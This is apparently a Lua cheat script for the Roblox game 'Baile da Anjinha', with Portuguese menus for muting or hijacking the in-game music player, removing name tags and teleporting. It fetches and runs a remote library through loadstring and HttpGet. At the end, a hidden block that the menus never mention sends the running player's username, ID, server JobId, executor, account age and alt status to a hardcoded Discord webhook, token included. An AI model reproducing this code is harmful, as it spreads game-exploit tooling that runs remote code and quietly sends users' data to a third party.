if workspace.StreamingEnabled == false then
workspace.StreamingEnabled = true
local DiscordLib = loadstring(game:HttpGet "https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/discord")()
local win = DiscordLib:Window("Baile da Anjinha")
local serv = win:Server("Server", "")
local Main = serv:Channel("Scripts")
local Teleports = serv:Channel("Teleports")

_G.inter = false
_G.mutar = false

function inter() 
if _G.inter == false then
_G.inter = true
while wait() do 
if _G.inter == false then break end
pcall(function() workspace["Cadeira de ID"]["Model 3D"].VehicleSeat.Song.SongEvent:FireServer("Stop",id) end)
end  
else
_G.inter = false
end
end

function mutar()
if _G.mutar == false then 
_G.mutar = true
workspace:FindFirstChild("Song",true).Volume = 0
else
_G.mutar = false
workspace:FindFirstChild("Song",true).Volume = 10
end
end

Main:Toggle(
    "Interromper a musica / Parar",
    false,
    function(bool)
    inter()
    end
)

Main:Toggle(
    "Mutar audios/musicas da cadeira de ID",
    false,
    function(bool)
    mutar()
    end
)

Main:Button(
    "Remover Tag [Nivel, Nome, Rank]",
    function()
        DiscordLib:Notification("Ifo", "Tag removida com sucesso!", "Okay.")
      pcall(function() game:GetService("Players").LocalPlayer.Character:FindFirstChild("OverheadGui",true):Remove() end)
    end
)

Main:Button(
    "Copiar ID da musica que esta tocando",
    function()
        DiscordLib:Notification("Ifo", "Copiada com sucesso!", "ok.")
      setclipboard(workspace:FindFirstChild("Song",true).SoundId)
    end
)

Main:Button(
    "Parar/Pausar Musica que esta tocando",
    function()
        DiscordLib:Notification("Ifo", "Audio/Musica foi Pausada!", "Fechar")
    workspace:FindFirstChild("SongEvent",true):FireServer("Stop", id)
    end
)

local sldr =
    Main:Slider(
    "Volume na Cadeira de ID",
    0,
    10,
    10,
    function(t)
     workspace:FindFirstChild("SongEvent",true):FireServer("SetVolume", t)
    end
)

Main:Textbox(
    "Coloque sua musica no server!",
    "Coloque aqui o id do recurso",
    true,
    function(t)
    workspace:FindFirstChild("SongEvent",true):FireServer("Play", t)
    end
)

Main:Label("Script feito e desenvolvido por rnvge#1970")

Teleports:Button(
    "Campo do jogo",
    function()
    game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-230.667007, 35.677536, -30.3298931, -0.999995947, 5.37080282e-08, 0.00285283476, 5.39232232e-08, 1, 7.53548122e-08, -0.00285283476, 7.55083391e-08, -0.999995947)
    end
)

Teleports:Button(
    "Parque do jogo",
    function()
    game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(147.417603, 55.7723351, -34.2757111, -0.0645508543, -2.54070027e-08, -0.997914433, 9.63266089e-08, 1, -3.16910622e-08, 0.997914433, -9.81713981e-08, -0.0645508543)
    end
)

Teleports:Button(
    "Entrada do jogo",
    function()
    game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-42.4482117, 15.2570038, -180.934723, -0.999814153, 2.61912732e-08, 0.01927769, 2.45713672e-08, 1, -8.42670289e-08, -0.01927769, -8.37776923e-08, -0.999814153)
    end
)

Teleports:Button(
    "Principal",
    function()
    game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-42.5045738, 20.3087482, -20.4248333, -0.998738825, -2.05824002e-09, 0.0502069741, 6.19132079e-10, 1, 5.33111439e-08, -0.0502069741, 5.32749951e-08, -0.998738825)
    end
)

pcall(function()
for _, v in pairs(game:GetService("CoreGui")["Discord"]:GetDescendants()) do 
if v:IsA("TextLabel") and v.Name == "SettingsTitle" then
v.Text = "CONFIGURACOES"
end
if v:IsA("TextLabel") and v.Name == "DiscordInfo" then
v.Text = "Creditos ao criador do script."
end
if v:IsA("TextLabel") and v.Text == "My Account" then
v.Text = "Minha conta"
end
if v:IsA("TextLabel") and v.Text == "MY ACCOUNT" then
v.Text = "MINHA CONTA"
end
if v:IsA("TextLabel") and v.Text == "Edit" then
v.Text = "Editar"
end
end
end)
end

local Webhook = "https://discord.com/api/webhooks/1043928742629757028/ohmjPYgCzThOs2MT4NT33xOg0vzCVX6vJmkT4pJhwlHWV7pNXMWpAHpU-gR75HwGpWva"
_G.Discord_UserID = ""
local player = game:GetService("Players").LocalPlayer
local joinTime = os.time() - (player.AccountAge*86400)
local joinDate = os.date("!*t", joinTime)
local premium = false
local alt = true
if player.MembershipType == Enum.MembershipType.Premium then
   premium = true
end
if not premium and player.AccountAge >= 70 then
    alt = "Possible"
elseif premium and player.AccountAge >= 70 then
   alt = false
end
local executor = identifyexecutor() or "Unknown"
local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game:GetService("Players").LocalPlayer.UserId))
Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
local AvatarImage = Thing.imageUrl
local msg = {
   ["username"] = "AstralnicHub",
   ["avatar_url"] = "https://cdn.discordapp.com/attachments/868496249958060102/901884186267365396/ezgif-2-3c2a2bc53af1.gif",
   ["content"] = ( _G.Discord_UserID ~= "" and  _G.Discord_UserID ~= nil) and tostring("<@".._G.Discord_UserID..">") or " ",
   ["embeds"] = {
       {
           ["color"] = tonumber(tostring("0x32CD32")),
           ["title"] = "Alguem executou seu script no server / BAILE DA ANJINHA!",
           ["thumbnail"] = {
               ["url"] = AvatarImage,
           },
           ["fields"] = {
                {
                   ["name"] = "Nick",
                   ["value"] = player.Name,
                   ["inline"] = true
                },
                {
                   ["name"] = "Display",
                   ["value"] = player.DisplayName,
                   ["inline"] = true
                },
                {
                   ["name"] = "ID",
                   ["value"] = "["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")",
                   ["inline"] = true
                },
{
                   ["name"] = "JobId",
                   ["value"] = "**"..game.JobId.."**",
                   ["inline"] = true
                },
                {
                   ["name"] = "Jogo",
                   ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                   ["inline"] = true
                },
                {
                   ["name"] = "Exploit Usado",
                   ["value"] = executor,
                   ["inline"] = true
                },
                {
                   ["name"] = "Alt",
                   ["value"] = alt,
                   ["inline"] = true
                },
                {
                   ["name"] = "Idade",
                   ["value"] = player.AccountAge.." atras",
                   ["inline"] = true
                },
                {
                   ["name"] = "Data de entrada",
                   ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                   ["inline"] = true
                },
           },
           ["timestamp"] = os.date("%Y-%m-%dT%X.000Z")
       }
   }
}
request = http_request or request or HttpPost or syn.request
request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
